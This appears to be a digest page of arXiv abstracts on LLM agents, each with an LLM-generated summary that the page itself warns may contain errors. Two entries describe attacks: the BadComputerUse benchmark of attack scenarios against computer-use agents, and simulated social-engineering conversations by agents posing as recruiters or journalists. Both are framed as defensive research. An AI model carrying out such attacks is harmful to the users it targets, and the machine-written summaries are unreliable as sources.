Published: 2025-09-11

Updated: 2025-10-07

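⚠️ All summaries below were generated by a large language model. They may contain errors, are for reference only, and should be used with caution.
🔴 Note: do not use them in serious academic settings. They are only suitable for screening papers before reading them.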

Updated 2025-09-11

AgentSentinel: An End-to-End and Real-Time Security Defense Framework for Computer-Use Agents

Authors:Haitao Hu, Peng Chen, Yanpeng Zhao, Yuqi Chen

Large Language Models (LLMs) have been increasingly integrated into computer-use agents, which can autonomously operate tools on a user’s computer to accomplish complex tasks. However, due to the inherently unstable and unpredictable nature of LLM outputs, they may issue unintended tool commands or incorrect inputs, leading to potentially harmful operations. Unlike traditional security risks stemming from insecure user prompts, tool execution results from LLM-driven decisions introduce new and unique security challenges. These vulnerabilities span across all components of a computer-use agent. To mitigate these risks, we propose AgentSentinel, an end-to-end, real-time defense framework designed to mitigate potential security threats on a user’s computer. AgentSentinel intercepts all sensitive operations within agent-related services and halts execution until a comprehensive security audit is completed. Our security auditing mechanism introduces a novel inspection process that correlates the current task context with system traces generated during task execution. To thoroughly evaluate AgentSentinel, we present BadComputerUse, a benchmark consisting of 60 diverse attack scenarios across six attack categories. The benchmark demonstrates an 87% average attack success rate on four state-of-the-art LLMs. Our evaluation shows that AgentSentinel achieves an average defense success rate of 79.6%, significantly outperforming all baseline defenses.

Paper and project links

PDF

Summary

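Computer-use agents driven by large language models (LLMs) carry security risks: the LLM may issue unintended tool commands or incorrect inputs that lead to harmful operations. The authors propose AgentSentinel, a defense framework that intercepts sensitive operations and holds them until a comprehensive security audit completes. In the evaluation, AgentSentinel reaches an average defense success rate of 79.6%, significantly outperforming all baseline defenses.

Key Takeaways

LLMs integrated into computer-use agents can complete complex tasks, but the instability and unpredictability of LLM outputs create security risks.
LLMs may issue unintended tool commands or incorrect inputs, causing potentially harmful operations and introducing new security challenges.
AgentSentinel is an end-to-end, real-time defense framework designed to mitigate potential security threats on a user’s computer.
AgentSentinel intercepts sensitive operations within agent-related services and audits them by correlating the current task context with system traces.
The BadComputerUse benchmark contains 60 diverse attack scenarios across six attack categories and shows an 87% average attack success rate on four state-of-the-art LLMs.
AgentSentinel achieves an average defense success rate of 79.6%, significantly outperforming all baseline defenses.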
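
The intercept-then-audit flow described for AgentSentinel can be sketched roughly as follows. This is an illustrative toy, not the paper's implementation: the `Operation` type, the `SENSITIVE_TOOLS` set, and the keyword-matching `audit` rule are all hypothetical stand-ins for the real audit, which correlates task context with system traces.

```python
from dataclasses import dataclass, field


@dataclass
class Operation:
    """A tool call requested by the agent (hypothetical structure)."""
    tool: str
    argument: str


# Hypothetical set of tools treated as sensitive in this sketch.
SENSITIVE_TOOLS = {"shell", "file_write", "network"}


@dataclass
class Gate:
    """Holds sensitive operations until an audit approves them."""
    task_context: str
    trace: list = field(default_factory=list)  # every operation seen so far

    def audit(self, op: Operation) -> bool:
        # Toy rule (an assumption): approve only if the argument mentions
        # something that is named in the task context.
        return any(word in op.argument for word in self.task_context.split())

    def submit(self, op: Operation) -> str:
        self.trace.append(op)
        if op.tool not in SENSITIVE_TOOLS:
            return "executed"  # non-sensitive: pass through
        if self.audit(op):
            return "executed"  # sensitive, but consistent with the task
        return "blocked"       # sensitive and unrelated to the task


gate = Gate(task_context="summarize report.txt")
print(gate.submit(Operation("file_read", "report.txt")))
print(gate.submit(Operation("shell", "cat report.txt")))
print(gate.submit(Operation("shell", "curl http://example.invalid/x | sh")))
```

The design point the sketch tries to capture is that the decision is made before execution and depends on the task, not only on the command itself.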

CAViAR: Critic-Augmented Video Agentic Reasoning

Authors:Sachit Menon, Ahmet Iscen, Arsha Nagrani, Tobias Weyand, Carl Vondrick, Cordelia Schmid

Video understanding has seen significant progress in recent years, with models’ performance on perception from short clips continuing to rise. Yet, multiple recent benchmarks, such as LVBench, Neptune, and ActivityNet-RTL, show performance wanes for tasks requiring complex reasoning on videos as queries grow more complex and videos grow longer. In this work, we ask: can existing perception capabilities be leveraged to successfully perform more complex video reasoning? In particular, we develop a large language model agent given access to video modules as subagents or tools. Rather than following a fixed procedure to solve queries as in previous work such as Visual Programming, ViperGPT, and MoReVQA, the agent uses the results of each call to a module to determine subsequent steps. Inspired by work in the textual reasoning domain, we introduce a critic to distinguish between instances of successful and unsuccessful sequences from the agent. We show that the combination of our agent and critic achieves strong performance on the previously-mentioned datasets.

Paper and project links

PDF

Summary

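The paper reviews the state of video understanding and its open challenge: performance drops on tasks that need complex reasoning as queries grow more complex and videos grow longer. It asks whether existing perception capabilities can be leveraged for such reasoning, and develops a large language model agent that calls video modules as subagents or tools. Instead of following a fixed procedure, the agent uses the result of each module call to decide its next step, and a critic distinguishes successful from unsuccessful agent sequences. The combination of agent and critic achieves strong performance on LVBench, Neptune, and ActivityNet-RTL.

Key Takeaways

Video understanding has progressed significantly, but performance still drops on reasoning tasks with complex queries and long videos.
The central question: can existing perception capabilities be leveraged to perform more complex video reasoning?
The authors develop a large language model agent that can call video modules as subagents or tools.
The agent decides dynamically, using the result of each module call to determine subsequent steps.
A critic is introduced to distinguish successful from unsuccessful agent sequences.
The combination of agent and critic achieves strong performance on LVBench, Neptune, and ActivityNet-RTL.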
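
One way to picture the critic's role is as a selector over several candidate agent trajectories. The sketch below assumes that usage; the abstract only says the critic distinguishes successful from unsuccessful sequences. The `Trajectory` layout and the `toy_critic` heuristic are hypothetical, since the paper's critic is a model and not a hand-written rule.

```python
from typing import Callable, List, Tuple

# A trajectory is the list of (module_name, result) steps the agent took,
# plus the final answer it produced. This layout is an assumption.
Trajectory = Tuple[List[Tuple[str, str]], str]


def select_with_critic(
    candidates: List[Trajectory],
    critic: Callable[[Trajectory], float],
) -> Trajectory:
    """Return the candidate trajectory that the critic scores highest."""
    return max(candidates, key=critic)


def toy_critic(trajectory: Trajectory) -> float:
    # Hypothetical heuristic: reward steps that returned non-empty results
    # and penalize an empty final answer.
    steps, answer = trajectory
    useful = sum(1 for _, result in steps if result)
    return useful + (1.0 if answer else -1.0)


candidates = [
    ([("retrieve_clip", ""), ("caption", "")], ""),
    ([("retrieve_clip", "clip_12"), ("caption", "a dog runs")], "a dog"),
]
best = select_with_critic(candidates, toy_critic)
print(best[1])
```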

AgentX: Towards Orchestrating Robust Agentic Workflow Patterns with FaaS-hosted MCP Services

Authors:Shiva Sai Krishna Anand Tokal, Vaibhav Jha, Anand Eswaran, Praveen Jayachandran, Yogesh Simmhan

Generative Artificial Intelligence (GenAI) has rapidly transformed various fields including code generation, text summarization, image generation and so on. Agentic AI is a recent evolution that further advances this by coupling the decision making and generative capabilities of LLMs with actions that can be performed using tools. While seemingly powerful, Agentic systems often struggle when faced with numerous tools, complex multi-step tasks, and long-context management to track history and avoid hallucinations. Workflow patterns such as Chain-of-Thought (CoT) and ReAct help address this. Here, we define a novel agentic workflow pattern, AgentX, composed of stage designer, planner, and executor agents that is competitive with or better than the state-of-the-art agentic patterns. We also leverage Model Context Protocol (MCP) tools, and propose two alternative approaches for deploying MCP servers as cloud Functions as a Service (FaaS). We empirically evaluate the success rate, latency and cost for AgentX and two contemporary agentic patterns, ReAct and Magentic One, using the FaaS and local MCP server alternatives for three practical applications. This highlights the opportunities and challenges of designing and deploying agentic workflows.

Paper and project links

PDF

Summary
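Generative AI (GenAI) has rapidly transformed fields such as code generation, text summarization, and image generation. Agentic AI goes further by coupling the decision-making and generative capabilities of LLMs with actions performed through tools. Agentic systems nonetheless struggle with large tool sets, complex multi-step tasks, and long-context management. To address this, the paper defines AgentX, a new agentic workflow pattern composed of stage designer, planner, and executor agents that is competitive with or better than state-of-the-art agentic patterns. It also uses Model Context Protocol (MCP) tools and proposes two alternative approaches for deploying MCP servers as cloud Functions as a Service (FaaS). The empirical evaluation compares success rate, latency, and cost for AgentX, ReAct, and Magentic One on three practical applications, using both FaaS and local MCP servers, and highlights the opportunities and challenges of designing and deploying agentic workflows.

Key Takeaways

GenAI has transformed multiple fields, including code generation, text summarization, and image generation.
Agentic AI couples the decision-making and generative capabilities of LLMs with tool-based actions.
Agentic systems struggle with numerous tools, complex multi-step tasks, and long-context management.
AgentX is a new agentic workflow pattern composed of stage designer, planner, and executor agents.
Using MCP tools, the paper proposes two alternative approaches for deploying MCP servers as cloud FaaS.
The empirical evaluation compares AgentX with ReAct and Magentic One on success rate, latency, and cost.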
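
The three-role pattern (stage designer, planner, executor) can be sketched as a simple pipeline. Everything here is a hypothetical illustration: in AgentX each role is an LLM agent and the tools are MCP services, whereas this sketch uses plain functions, string matching, and in-process lambdas.

```python
from typing import Callable, Dict, List

Tools = Dict[str, Callable[[str], str]]


def stage_designer(task: str) -> List[str]:
    # Hypothetical rule: split the task into stages on the word "then".
    return [part.strip() for part in task.split(" then ")]


def planner(stage: str, tools: Tools) -> List[str]:
    # Hypothetical rule: plan one call for each tool named in the stage.
    return [name for name in tools if name in stage]


def executor(plan: List[str], stage: str, tools: Tools) -> List[str]:
    # Run each planned tool on the stage description.
    return [tools[name](stage) for name in plan]


def run(task: str, tools: Tools) -> List[str]:
    history: List[str] = []
    for stage in stage_designer(task):
        plan = planner(stage, tools)
        history.extend(executor(plan, stage, tools))
    return history


tools: Tools = {
    "search": lambda s: f"search results for: {s}",
    "summarize": lambda s: f"summary of: {s}",
}
print(run("search recent papers then summarize findings", tools))
```

Planning per stage keeps each planner call focused on a short piece of the task, which is one plausible reading of how the pattern limits context growth.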

Towards Generalized Routing: Model and Agent Orchestration for Adaptive and Efficient Inference

Authors:Xiyu Guo, Shan Wang, Chunfang Ji, Xuefeng Zhao, Wenhao Xi, Yaoyao Liu, Qinglan Li, Chao Deng, Junlan Feng

The rapid advancement of large language models (LLMs) and domain-specific AI agents has greatly expanded the ecosystem of AI-powered services. User queries, however, are highly diverse and often span multiple domains and task types, resulting in a complex and heterogeneous landscape. This diversity presents a fundamental routing challenge: how to accurately direct each query to an appropriate execution unit while optimizing both performance and efficiency. To address this, we propose MoMA (Mixture of Models and Agents), a generalized routing framework that integrates both LLM and agent-based routing. Built upon a deep understanding of model and agent capabilities, MoMA effectively handles diverse queries through precise intent recognition and adaptive routing strategies, achieving an optimal balance between efficiency and cost. Specifically, we construct a detailed training dataset to profile the capabilities of various LLMs under different routing model structures, identifying the most suitable tasks for each LLM. During inference, queries are dynamically routed to the LLM with the best cost-performance efficiency. We also introduce an efficient agent selection strategy based on a context-aware state machine and dynamic masking. Experimental results demonstrate that the MoMA router offers superior cost-efficiency and scalability compared to existing approaches.

Paper and project links

PDF

Summary

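The rapid advancement of LLMs and domain-specific AI agents has greatly expanded the ecosystem of AI-powered services. User queries are highly diverse and often span multiple domains and task types, which makes accurate routing difficult. The authors propose MoMA (Mixture of Models and Agents), a generalized routing framework that integrates LLM routing and agent-based routing. Building on a detailed understanding of model and agent capabilities, MoMA handles diverse queries through precise intent recognition and adaptive routing strategies, balancing efficiency and cost. A detailed training dataset profiles the capabilities of various LLMs under different routing model structures and identifies the tasks each LLM suits best. At inference time, each query is routed dynamically to the LLM with the best cost-performance efficiency. Experiments show that the MoMA router offers better cost-efficiency and scalability than existing approaches.

Key Takeaways

The rapid advancement of LLMs and domain-specific AI agents has expanded the ecosystem of AI-powered services.
The diversity of user queries makes accurate routing a fundamental challenge.
MoMA is a generalized routing framework that integrates LLM routing and agent-based routing to handle diverse queries.
MoMA builds on an understanding of model and agent capabilities to perform precise intent recognition and adaptive routing.
A detailed training dataset profiles LLM capabilities under different routing model structures and matches each LLM to its most suitable tasks.
At inference time, queries are dynamically routed to the LLM with the best cost-performance efficiency.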
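
A minimal sketch of cost-aware routing with masking, under stated assumptions: MoMA's router is learned from a profiling dataset, while this example uses a hand-written capability table. `ModelProfile`, the `min_quality` bar, and the model names are hypothetical, and the `masked` set is only a loose stand-in for the dynamic masking that the abstract describes for agent selection.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class ModelProfile:
    name: str
    cost: float               # hypothetical cost per query
    skill: Dict[str, float]   # hypothetical per-intent quality in [0, 1]


def route(intent: str, models: List[ModelProfile],
          min_quality: float = 0.7,
          masked: Optional[Set[str]] = None) -> Optional[str]:
    """Pick the cheapest unmasked model whose profiled quality meets the bar."""
    masked = masked or set()
    eligible = [
        m for m in models
        if m.name not in masked and m.skill.get(intent, 0.0) >= min_quality
    ]
    if not eligible:
        return None  # nothing suitable: the caller must fall back
    return min(eligible, key=lambda m: m.cost).name


models = [
    ModelProfile("small", cost=1.0, skill={"chat": 0.8, "math": 0.4}),
    ModelProfile("large", cost=10.0, skill={"chat": 0.9, "math": 0.9}),
]
print(route("chat", models))
print(route("math", models))
print(route("math", models, masked={"large"}))
```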

VeriOS: Query-Driven Proactive Human-Agent-GUI Interaction for Trustworthy OS Agents

Authors:Zheng Wu, Heyuan Huang, Xingyu Lou, Xiangmou Qu, Pengzhou Cheng, Zongru Wu, Weiwen Liu, Weinan Zhang, Jun Wang, Zhaoxiang Wang, Zhuosheng Zhang

With the rapid progress of multimodal large language models, operating system (OS) agents become increasingly capable of automating tasks through on-device graphical user interfaces (GUIs). However, most existing OS agents are designed for idealized settings, whereas real-world environments often present untrustworthy conditions. To mitigate risks of over-execution in such scenarios, we propose a query-driven human-agent-GUI interaction framework that enables OS agents to decide when to query humans for more reliable task completion. Built upon this framework, we introduce VeriOS-Agent, a trustworthy OS agent trained with a two-stage learning paradigm that facilitates the decoupling and utilization of meta-knowledge. Concretely, VeriOS-Agent autonomously executes actions in normal conditions while proactively querying humans in untrustworthy scenarios. Experiments show that VeriOS-Agent improves the average step-wise success rate by 20.64% in untrustworthy scenarios over the state-of-the-art, without compromising normal performance. Analysis highlights VeriOS-Agent’s rationality, generalizability, and scalability. The codes, datasets and models are available at https://github.com/Wuzheng02/VeriOS.

Paper and project links

PDF

Summary
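Rapid progress in multimodal large language models lets operating system (OS) agents automate tasks through on-device graphical user interfaces (GUIs). Because real-world environments often present untrustworthy conditions, the authors propose a query-driven human-agent-GUI interaction framework in which the OS agent decides when to query a human for more reliable task completion. Built on this framework, VeriOS-Agent is a trustworthy OS agent trained with a two-stage learning paradigm that facilitates the decoupling and utilization of meta-knowledge. It executes actions autonomously under normal conditions and proactively queries humans in untrustworthy scenarios. Experiments show that VeriOS-Agent improves the average step-wise success rate in untrustworthy scenarios by 20.64% over the state of the art without compromising normal performance. Analysis highlights its rationality, generalizability, and scalability. The code, datasets, and models are available at https://github.com/Wuzheng02/VeriOS.

Key Takeaways

Progress in multimodal large language models makes OS agents increasingly capable of automating tasks through on-device GUIs.
Untrustworthy conditions in real environments require OS agents to query humans when needed so that tasks complete more reliably.
VeriOS-Agent, built on the query-driven framework, proactively queries humans in untrustworthy scenarios while still acting autonomously under normal conditions.
VeriOS-Agent is trained with a two-stage learning paradigm that facilitates the decoupling and utilization of meta-knowledge.
In untrustworthy scenarios, VeriOS-Agent improves the average step-wise success rate by 20.64% over the state of the art.
The gain in untrustworthy scenarios comes without compromising performance under normal conditions.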
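
The act-or-ask decision can be illustrated with a tiny sketch. It is only a schematic: VeriOS-Agent learns this decision through training, whereas the example assumes a hypothetical `trust_score` estimate and a fixed threshold.

```python
from dataclasses import dataclass


@dataclass
class Step:
    action: str          # action the agent proposes for the current screen
    trust_score: float   # hypothetical estimate that the screen is trustworthy


def decide(step: Step, threshold: float = 0.5) -> str:
    """Execute autonomously when the scene looks normal, otherwise ask a human."""
    if step.trust_score >= threshold:
        return f"execute: {step.action}"
    return f"query human before: {step.action}"


print(decide(Step("tap 'Settings'", trust_score=0.9)))
print(decide(Step("tap 'Allow' on unexpected pop-up", trust_score=0.2)))
```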

T-araVLN: Translator for Agricultural Robotic Agents on Vision-and-Language Navigation

Authors:Xiaobei Zhao, Xingqi Lyu, Xiang Li

Agricultural robotic agents have become powerful helpers in a wide range of agricultural tasks, but they still rely heavily on manual operation or untransportable railways for movement. The AgriVLN method and the A2A benchmark pioneeringly extend Vision-and-Language Navigation (VLN) to the agricultural domain, enabling agents to navigate to the target position following natural language instructions. AgriVLN effectively understands simple instructions, but often misunderstands complicated ones. To bridge this gap, we propose the method of Translator for Agricultural Robotic Agents on Vision-and-Language Navigation (T-araVLN), in which the Instruction Translator module translates the original instruction to be both refined and precise. Evaluated on the A2A benchmark, our T-araVLN effectively improves SR from 0.47 to 0.63 and reduces NE from 2.91m to 2.28m, demonstrating state-of-the-art performance in the agricultural domain. Code: https://github.com/AlexTraveling/T-araVLN.

Paper and project links

PDF

Summary

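Agricultural robots have become capable helpers in a wide range of agricultural tasks, but they still rely heavily on manual operation or untransportable railways for movement. The AgriVLN method and the A2A benchmark were the first to extend Vision-and-Language Navigation (VLN) to the agricultural domain, enabling agents to navigate to a target position by following natural language instructions. AgriVLN understands simple instructions well but often misunderstands complicated ones. To bridge this gap, the authors propose T-araVLN (Translator for Agricultural Robotic Agents on Vision-and-Language Navigation), whose Instruction Translator module rewrites the original instruction so that it is both refined and precise. On the A2A benchmark, T-araVLN improves success rate (SR) from 0.47 to 0.63 and reduces navigation error (NE) from 2.91 m to 2.28 m, which is state-of-the-art performance in the agricultural domain.

Key Takeaways

Agricultural robots help with a wide range of agricultural tasks but still depend on manual operation or untransportable railways to move.
The AgriVLN method and the A2A benchmark were the first to bring Vision-and-Language Navigation to the agricultural domain.
AgriVLN understands simple instructions well but often misunderstands complicated ones.
T-araVLN addresses this with an Instruction Translator module that rewrites the original instruction to be refined and precise.
On the A2A benchmark, T-araVLN improves SR from 0.47 to 0.63 and reduces NE from 2.91 m to 2.28 m.
T-araVLN demonstrates state-of-the-art performance in the agricultural domain.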
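
To put the reported numbers in context, the sketch below computes success rate (SR) and navigation error (NE) in the way they are commonly defined for VLN, and then the relative change implied by the abstract's figures. The success `threshold` is a free parameter here, because the source does not state the value A2A uses, and the function names are illustrative.

```python
from typing import List


def success_rate(final_distances: List[float], threshold: float) -> float:
    """Fraction of episodes that stop within `threshold` metres of the target."""
    return sum(d <= threshold for d in final_distances) / len(final_distances)


def navigation_error(final_distances: List[float]) -> float:
    """Mean distance in metres between the stop position and the target."""
    return sum(final_distances) / len(final_distances)


def relative_change(before: float, after: float) -> float:
    """Signed change relative to the starting value."""
    return (after - before) / before


# Figures reported in the abstract.
sr_gain = relative_change(0.47, 0.63)
ne_drop = relative_change(2.91, 2.28)
print(f"SR relative change: {sr_gain:+.1%}")
print(f"NE relative change: {ne_drop:+.1%}")
```

In absolute terms the abstract's figures correspond to a gain of 0.16 in SR and a reduction of 0.63 m in NE.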

SFR-DeepResearch: Towards Effective Reinforcement Learning for Autonomously Reasoning Single Agents

Authors:Xuan-Phi Nguyen, Shrey Pandit, Revanth Gangi Reddy, Austin Xu, Silvio Savarese, Caiming Xiong, Shafiq Joty

Equipping large language models (LLMs) with complex, interleaved reasoning and tool-use capabilities has become a key focus in agentic AI research, especially with recent advances in reasoning-oriented (“thinking”) models. Such capabilities are key to unlocking a number of important applications. One such application is Deep Research (DR), which requires extensive search and reasoning over many sources. Our work in this paper focuses on the development of native Autonomous Single-Agent models for DR featuring minimal web crawling and Python tool integration. Unlike multi-agent systems, where agents take up pre-defined roles and are told what to do at each step in a static workflow, an autonomous single-agent determines its next action dynamically based on context, without manual directive. While prior work has proposed training recipes for base or instruction-tuned LLMs, we focus on continual reinforcement learning (RL) of reasoning-optimized models to further enhance agentic skills while preserving reasoning ability. Towards this end, we propose a simple RL recipe with entirely synthetic data, which we apply to various open-source LLMs. Our best variant SFR-DR-20B achieves up to 28.7% on Humanity’s Last Exam benchmark. In addition, we conduct key analysis experiments to provide more insights into our methodologies.

Paper and project links

PDF Technical Report

Summary

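Equipping LLMs with complex, interleaved reasoning and tool-use capabilities has become a key focus of agentic AI research, especially with recent reasoning-oriented (“thinking”) models. This paper develops native autonomous single-agent models for Deep Research (DR) with minimal web crawling and Python tool integration. Unlike multi-agent systems, an autonomous single agent determines its next action dynamically from context, without manual directives. The authors focus on continual reinforcement learning (RL) of reasoning-optimized models to enhance agentic skills while preserving reasoning ability. They propose a simple RL recipe that uses entirely synthetic data and apply it to various open-source LLMs. The best variant, SFR-DR-20B, achieves up to 28.7% on the Humanity’s Last Exam benchmark.

Key Takeaways

Complex, interleaved reasoning and tool-use capabilities for LLMs have become a key focus of agentic AI research.
An autonomous single agent decides its next action dynamically, unlike multi-agent systems with predefined roles in a static workflow.
The paper develops autonomous single-agent models for Deep Research (DR) with minimal web crawling and Python tool integration.
Continual reinforcement learning (RL) is applied to reasoning-optimized models to enhance agentic skills while preserving reasoning ability.
The proposed RL recipe is simple, uses entirely synthetic data, and is applied to various open-source LLMs.
The best variant, SFR-DR-20B, achieves up to 28.7% on the Humanity’s Last Exam benchmark.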

EvoEmo: Towards Evolved Emotional Policies for LLM Agents in Multi-Turn Negotiation

Authors:Yunbo Long, Liming Xu, Lukas Beckenbauer, Yuhan Liu, Alexandra Brintrup

Recent research on Chain-of-Thought (CoT) reasoning in Large Language Models (LLMs) has demonstrated that agents can engage in complex, multi-turn negotiations, opening new avenues for agentic AI. However, existing LLM agents largely overlook the functional role of emotions in such negotiations, instead generating passive, preference-driven emotional responses that make them vulnerable to manipulation and strategic exploitation by adversarial counterparts. To address this gap, we present EvoEmo, an evolutionary reinforcement learning framework that optimizes dynamic emotional expression in negotiations. EvoEmo models emotional state transitions as a Markov Decision Process and employs population-based genetic optimization to evolve high-reward emotion policies across diverse negotiation scenarios. We further propose an evaluation framework with two baselines (vanilla strategies and fixed-emotion strategies) for benchmarking emotion-aware negotiation. Extensive experiments and ablation studies show that EvoEmo consistently outperforms both baselines, achieving higher success rates, higher efficiency, and increased buyer savings. These findings highlight the importance of adaptive emotional expression in enabling more effective LLM agents for multi-turn negotiation.

Paper and project links

PDF

Summary

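Recent research on Chain-of-Thought (CoT) reasoning shows that LLM agents can carry out complex, multi-turn negotiations, opening new directions for agentic AI. Existing LLM agents, however, largely overlook the functional role of emotions in negotiation and produce passive, preference-driven emotional responses, which leaves them open to manipulation and strategic exploitation by adversarial counterparts. To address this gap, the authors present EvoEmo, an evolutionary reinforcement learning framework that optimizes dynamic emotional expression in negotiations. EvoEmo models emotional state transitions as a Markov Decision Process and uses population-based genetic optimization to evolve high-reward emotion policies across diverse negotiation scenarios. The evaluation framework includes two baselines, vanilla strategies and fixed-emotion strategies. Extensive experiments and ablation studies show that EvoEmo outperforms both baselines in success rate, efficiency, and buyer savings, which underlines the value of adaptive emotional expression for LLM agents in multi-turn negotiation.

Key Takeaways

With Chain-of-Thought (CoT) reasoning, LLM agents can engage in complex, multi-turn negotiations.
Existing LLM agents overlook the role of emotions in negotiation and are vulnerable to strategic manipulation by counterparts.
EvoEmo is an evolutionary reinforcement learning framework that optimizes dynamic emotional expression in negotiations.
EvoEmo models emotional state transitions as a Markov Decision Process.
Population-based genetic optimization evolves emotion policies for diverse negotiation scenarios.
The evaluation framework uses vanilla strategies and fixed-emotion strategies as baselines.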
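
The idea of evolving an emotion policy with a population-based search can be sketched as below. This is a toy under loud assumptions: the three-emotion state space, the deterministic policy, the hand-written `rollout_reward`, and the mutation-only search with elitism are all hypothetical. In EvoEmo the reward comes from negotiation outcomes, not from a fixed formula.

```python
import random

EMOTIONS = ["neutral", "angry", "happy"]


def random_policy(rng):
    """A policy maps the current emotion to the next emotion to express."""
    return {e: rng.choice(EMOTIONS) for e in EMOTIONS}


def rollout_reward(policy, turns=6):
    # Toy reward (an assumption): anger right after neutrality pays off,
    # repeated anger is penalized, expressing happiness gives a small bonus.
    state, total = "neutral", 0.0
    for _ in range(turns):
        nxt = policy[state]
        if state == "neutral" and nxt == "angry":
            total += 2.0
        elif state == "angry" and nxt == "angry":
            total -= 1.0
        elif nxt == "happy":
            total += 0.5
        state = nxt
    return total


def mutate(policy, rng, rate=0.3):
    """Resample each transition with probability `rate`."""
    return {e: (rng.choice(EMOTIONS) if rng.random() < rate else nxt)
            for e, nxt in policy.items()}


def evolve(generations=30, pop_size=20, seed=0):
    rng = random.Random(seed)
    population = [random_policy(rng) for _ in range(pop_size)]
    for _ in range(generations):
        population.sort(key=rollout_reward, reverse=True)
        elite = population[: pop_size // 4]  # keep the top quarter unchanged
        children = [mutate(rng.choice(elite), rng)
                    for _ in range(pop_size - len(elite))]
        population = elite + children
    return max(population, key=rollout_reward)


best = evolve()
print(best, rollout_reward(best))
```

Keeping the elite unchanged means the best reward in the population never decreases from one generation to the next.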

AI-SearchPlanner: Modular Agentic Search via Pareto-Optimal Multi-Objective Reinforcement Learning

Authors:Lang Mei, Zhihan Yang, Chong Chen

Recent studies have explored integrating Large Language Models (LLMs) with search engines to leverage both the LLMs’ internal pre-trained knowledge and external information. In particular, reinforcement learning (RL) has emerged as a promising paradigm for enhancing LLM reasoning through multi-turn interactions with search engines. However, existing RL-based search agents rely on a single LLM to handle both search planning and question-answering (QA) tasks in an end-to-end manner, which limits their ability to optimize both capabilities simultaneously. In practice, sophisticated AI search systems often employ a large, frozen LLM (e.g., GPT-4, DeepSeek-R1) to ensure high-quality QA. Thus, a more effective and efficient approach is to utilize a small, trainable LLM dedicated to search planning. In this paper, we propose AI-SearchPlanner, a novel reinforcement learning framework designed to enhance the performance of frozen QA models by focusing on search planning. Specifically, our approach introduces three key innovations: 1) Decoupling the Architecture of the Search Planner and Generator, 2) Dual-Reward Alignment for Search Planning, and 3) Pareto Optimization of Planning Utility and Cost, to achieve the objectives. Extensive experiments on real-world datasets demonstrate that AI-SearchPlanner outperforms existing RL-based search agents in both effectiveness and efficiency, while exhibiting strong generalization capabilities across diverse frozen QA models and data domains.

Paper and project links

PDF

Summary

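Recent work integrates LLMs with search engines to combine the LLM's internal pre-trained knowledge with external information, and reinforcement learning (RL) has emerged as a promising way to strengthen LLM reasoning through multi-turn interaction with search engines. Existing RL-based search agents, however, rely on a single LLM for both search planning and question answering (QA), which limits how well both capabilities can be optimized together. The paper proposes AI-SearchPlanner, an RL framework that improves the performance of frozen QA models by focusing on search planning with a small, trainable LLM. It introduces three innovations: decoupling the architecture of the search planner and the generator, dual-reward alignment for search planning, and Pareto optimization of planning utility and cost. Experiments on real-world datasets show that AI-SearchPlanner outperforms existing RL-based search agents in both effectiveness and efficiency and generalizes well across diverse frozen QA models and data domains.

Key Takeaways

Integrating LLMs with search engines combines the LLM's internal knowledge with external information.
Reinforcement learning (RL) is used to strengthen LLM reasoning through multi-turn interaction with search engines.
Existing RL-based search agents use a single LLM for both search planning and QA, which limits joint optimization.
AI-SearchPlanner improves the performance of frozen QA models by focusing on search planning.
Its three key innovations are architecture decoupling, dual-reward alignment, and Pareto optimization of planning utility and cost.
On real-world datasets, AI-SearchPlanner outperforms existing RL-based search agents in both effectiveness and efficiency.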
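
The trade-off between planning utility and cost can be made concrete with a Pareto-front filter. The sketch below is a generic illustration of Pareto dominance, not the paper's training objective. The plan names, utilities, and costs are made-up example values.

```python
from typing import List, Tuple

Plan = Tuple[str, float, float]  # (name, utility, cost), all hypothetical


def pareto_front(plans: List[Plan]) -> List[Plan]:
    """Keep the plans that no other plan dominates.

    Plan a dominates plan b if a's utility is >= b's and a's cost is <= b's,
    with at least one of the two strictly better.
    """
    front = []
    for name, u, c in plans:
        dominated = any(
            (u2 >= u and c2 <= c) and (u2 > u or c2 < c)
            for _, u2, c2 in plans
        )
        if not dominated:
            front.append((name, u, c))
    return front


plans = [
    ("no_search", 0.40, 0.0),
    ("one_query", 0.65, 1.0),
    ("three_queries", 0.70, 3.0),
    ("wasteful", 0.60, 4.0),
]
print([name for name, _, _ in pareto_front(plans)])
```

Here `wasteful` is dropped because `one_query` is both more useful and cheaper. The remaining plans each represent a different utility-cost trade-off.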

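Personalized Attacks of Social Engineering in Multi-turn Conversations: LLM Agents for Simulation and Detection

Authors:Tharindu Kumarage, Cameron Johnson, Jadie Adams, Lin Ai, Matthias Kirchner, Anthony Hoogs, Joshua Garland, Julia Hirschberg, Arslan Basharat, Huan Liu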

The rapid advancement of conversational agents, particularly chatbots powered by Large Language Models (LLMs), poses a significant risk of social engineering (SE) attacks on social media platforms. SE detection in multi-turn, chat-based interactions is considerably more complex than single-instance detection due to the dynamic nature of these conversations. A critical factor in mitigating this threat is understanding the mechanisms through which SE attacks operate, specifically how attackers exploit vulnerabilities and how victims’ personality traits contribute to their susceptibility. In this work, we propose an LLM-agentic framework, SE-VSim, to simulate SE attack mechanisms by generating multi-turn conversations. We model victim agents with varying personality traits to assess how psychological profiles influence susceptibility to manipulation. Using a dataset of over 1000 simulated conversations, we examine attack scenarios in which adversaries, posing as recruiters, funding agencies, and journalists, attempt to extract sensitive information. Based on this analysis, we present a proof of concept, SE-OmniGuard, to offer personalized protection to users by leveraging prior knowledge of the victim’s personality, evaluating attack strategies, and monitoring information exchanges in conversations to identify potential SE attempts.

Paper and project links

PDF Accepted as a paper at COLM 2025 Workshop on AI Agents: Capabilities and Safety

Summary

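Conversational agents, particularly chatbots powered by LLMs, pose a significant risk of social engineering (SE) attacks on social media platforms. Detecting SE in multi-turn conversations is considerably harder than single-instance detection. Mitigating the threat depends on understanding how SE attacks operate, including how attackers exploit vulnerabilities and how victims' personality traits contribute to their susceptibility. The paper proposes SE-VSim, an LLM-agentic framework that simulates SE attack mechanisms by generating multi-turn conversations, with victim agents modeled on varying personality traits to assess how psychological profiles influence susceptibility to manipulation. Using a dataset of over 1000 simulated conversations, the authors examine attack scenarios in which adversaries posing as recruiters, funding agencies, and journalists try to extract sensitive information. Based on this analysis they present a proof of concept, SE-OmniGuard, which offers personalized protection to users by leveraging prior knowledge of the victim's personality, evaluating attack strategies, and monitoring information exchanges in conversations to identify potential SE attempts.

Key Takeaways

Conversational agents and LLM-powered chatbots pose a risk of social engineering attacks on social media platforms.
SE detection is more complex in multi-turn conversations and requires an understanding of how SE attacks operate.
SE attack mechanisms include how attackers exploit vulnerabilities and how victims' personality traits affect susceptibility.
SE-VSim is an LLM-agentic framework that simulates SE attack mechanisms in multi-turn conversations.
The study uses a dataset of over 1000 simulated conversations.
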